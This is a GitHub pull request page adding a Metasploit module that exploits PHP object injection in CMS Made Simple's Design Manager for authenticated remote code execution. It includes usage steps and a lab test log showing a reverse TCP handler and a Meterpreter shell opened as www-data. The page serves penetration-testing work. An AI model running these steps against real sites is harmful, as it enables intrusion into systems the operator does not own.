Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add CMS Made Simple object injection exploit module #12529

Merged
merged 13 commits into from Nov 13, 2019

Conversation

@scanu92
Copy link
Contributor

scanu92 commented Nov 1, 2019

CMS Made Simple is an open source cms. With this CMS you can modify the contents with a pre-installed module called "Design Manager" that it's vulnerable to object injection.

This module exploit an unserialize in CMS Made Simple 2.2.6, 2.2.7, 2.2.8, 2.2.9 and 2.2.9.1 sending a serialized object that lead to remote code execution.

Verification

Launch metasploit and set the appropiate options:

  • Start msfconsole
  • use exploit/multi/http/cmsms_object_injection_rce
  • set RHOST <IP>
  • set USERNAME <USERNAME>
  • set PASSWORD <PASSWORD>
  • exploit
scanu92 added 3 commits Nov 1, 2019
Add NormalRanking to cmsms_object_injection_rce module
scanu92 added 2 commits Nov 2, 2019
scanu92 and others added 5 commits Nov 2, 2019
Co-Authored-By: bcoles <bcoles@gmail.com>
Co-Authored-By: bcoles <bcoles@gmail.com>
Co-Authored-By: bcoles <bcoles@gmail.com>
Co-Authored-By: bcoles <bcoles@gmail.com>
Co-Authored-By: bcoles <bcoles@gmail.com>
@space-r7 space-r7 self-assigned this Nov 11, 2019
scanu92 and others added 3 commits Nov 12, 2019
Co-Authored-By: Shelby Pace <40177151+space-r7@users.noreply.github.com>
@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Nov 13, 2019

Tested on CMSMS v2.2.9:

msf5 > use exploit/multi/http/cmsms_object_injection_rce 
msf5 exploit(multi/http/cmsms_object_injection_rce) > set rhosts 192.168.37.163
rhosts => 192.168.37.163
msf5 exploit(multi/http/cmsms_object_injection_rce) > set username blah
username => blah
msf5 exploit(multi/http/cmsms_object_injection_rce) > set password password
password => password
msf5 exploit(multi/http/cmsms_object_injection_rce) > set targeturi cmsms
targeturi => cmsms
msf5 exploit(multi/http/cmsms_object_injection_rce) > check
[*] 192.168.37.163:80 - The target appears to be vulnerable.
msf5 exploit(multi/http/cmsms_object_injection_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (38288 bytes) to 192.168.37.163
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.163:48094) at 2019-11-13 08:27:24 -0600
[+] Deleted QutroSBip.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64
Meterpreter : php/linux
space-r7 added a commit that referenced this pull request Nov 13, 2019
@space-r7 space-r7 merged commit d9b0c1a into rapid7:master Nov 13, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
msjenkins-r7 added a commit that referenced this pull request Nov 13, 2019
@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Nov 13, 2019

Release Notes

This adds an exploit for CMS Made Simple versions 2.9.1 and below. The Design Manager module that is installed with CMSMS by default is vulnerable to PHP object injection, enabling remote code execution.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
5 participants
You can’t perform that action at this time.